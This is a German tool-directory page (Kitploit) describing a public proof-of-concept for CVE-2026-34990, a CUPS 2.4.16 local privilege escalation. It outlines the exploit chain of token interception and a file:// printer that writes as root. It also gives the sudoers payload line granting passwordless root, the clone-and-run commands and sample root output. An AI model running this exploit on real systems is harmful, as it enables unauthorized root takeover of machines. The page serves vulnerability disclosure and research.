Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-34990-CUPS-LPE-PoC — Generischer PoC für CVE-2026-34990 – CUPS 2.4.16 lokale Rechteausweitung über lokale Token-Offenlegung und beliebiges Überschreiben von Root-Dateien. | Kitploit
Tools/GitHubGitHub/noorkhalel/cve-2026-34990-cups-lpe-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstests
GitHubnoorkhalel/cve-2026-34990-cups-lpe-poc

CVE-2026-34990-CUPS-LPE-PoC

Generischer PoC für CVE-2026-34990 – CUPS 2.4.16 lokale Rechteausweitung über lokale Token-Offenlegung und beliebiges Überschreiben von Root-Dateien.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
2vor 2 TagenNoch nicht geprüft

CVE-2026-34990 | CUPS Local Privilege Escalation PoC

Ein generischer Proof-of-Concept für CVE-2026-34990, eine lokale Privilegieneskalations-Schwachstelle, die CUPS 2.4.16 betrifft.

Der Exploit demonstriert, wie ein lokaler unprivilegierter Benutzer die lokale CUPS-Authentifizierung und das Verhalten der Druckerkonfiguration missbrauchen kann, um einen beliebigen Dateischreibvorgang als root zu erlangen und Privilegien zu eskalieren.

Schwachstelle

  • CVE: CVE-2026-34990
  • Komponente: CUPS
  • Getestete Version: CUPS 2.4.16
  • Typ: Lokale Privilegieneskalation
  • Auswirkung: Beliebiger Dateischreibvorgang als root
  • Behobene Version: CUPS 2.4.17

Schwachstellen-Anerkennung

CVE-2026-34990 wurde ursprünglich gemeldet von:

Asim Viladi Oglu Manizada (@manizada)

Ich bin nicht der Entdecker dieser Schwachstelle.

Dieses Repository enthält meine angepasste und getestete Proof-of-Concept-Implementierung, die auf öffentlich offengelegten technischen Informationen basiert.

Funktionsweise

Auf hoher Ebene ist die Exploit-Kette:

Lokaler unprivilegierter Benutzer
        |
        v
Temporären CUPS-Drucker erstellen
        |
        v
Ausgehende IPP-Authentifizierung auslösen
        |
        v
Authorization: Local Token abfangen
        |
        v
Token gegen privilegierte CUPS-Operationen wiederverwenden
        |
        v
file://-Drucker erstellen/persistieren
        |
        v
Druckauftrag übermitteln
        |
        v
Beliebiger Dateischreibvorgang mit root-Eigentümer
        |
        v
Privilegieneskalation

Der PoC verwendet automatisch den aktuellen lokalen Benutzernamen.

Zum Beispiel, wenn ausgeführt als:

alice

zielt die Demonstrations-Payload auf:

/etc/sudoers.d/alice-pwn

und versucht zu schreiben:

alice ALL=(ALL) NOPASSWD: ALL

Ein erfolgreicher Exploit kann dann verifiziert werden mit:

sudo -n id

Beispiel:

uid=0(root) gid=0(root) groups=0(root)

Voraussetzungen

Der PoC erwartet:

  • Linux
  • Python 3
  • Verwundbare CUPS-Installation
  • ipptool
  • lp
  • lpstat
  • Lokalen Zugriff auf den CUPS-Scheduler

CUPS-Version prüfen:

cups-config --version

Prüfen, ob der Scheduler läuft:

lpstat -r

Lokalen CUPS-Listener prüfen:

ss -lnt | grep 631

Verwendung

Repository klonen:

git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC

Ausführen:

python3 exploit.py

Beispielausgabe:

[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn

[+] Local token: <LOCAL_TOKEN>

[*] attempt 1: <printer-name>

[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)

[*] next: sudo -n bash

Nach erfolgreicher Ausnutzung:

sudo -n bash

Umfang

Dieser PoC ist absichtlich als generische Implementierung der öffentlich offengelegten CVE geschrieben.

Er enthält nicht:

  • CTF-spezifische Informationen
  • Informationen zu Trainingsplattformen
  • Maschinennamen
  • Anmeldedaten
  • Flags
  • Ziel-IP-Adressen
  • Umgebungsspezifische Geheimnisse

Haftungsausschluss

Dieser Code wird bereitgestellt für:

  • Sicherheitsforschung
  • Reproduktion von Schwachstellen
  • Defensive Tests
  • Bildungszwecke
  • Autorisierte Penetrationstests

Verwenden Sie diesen Code nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben.

Der Autor ist nicht für den Missbrauch dieser Software verantwortlich.

Danksagungen

Entdeckung der Schwachstelle:
Asim Viladi Oglu Manizada (@manizada)

PoC-Anpassung, Tests und Dokumentation:
Noor Khalil

Referenzen

  • CVE-2026-34990
  • OpenPrinting CUPS
  • OpenPrinting Security Advisory - GHSA-c54j-2vqw-wpwp
Tool herunterladen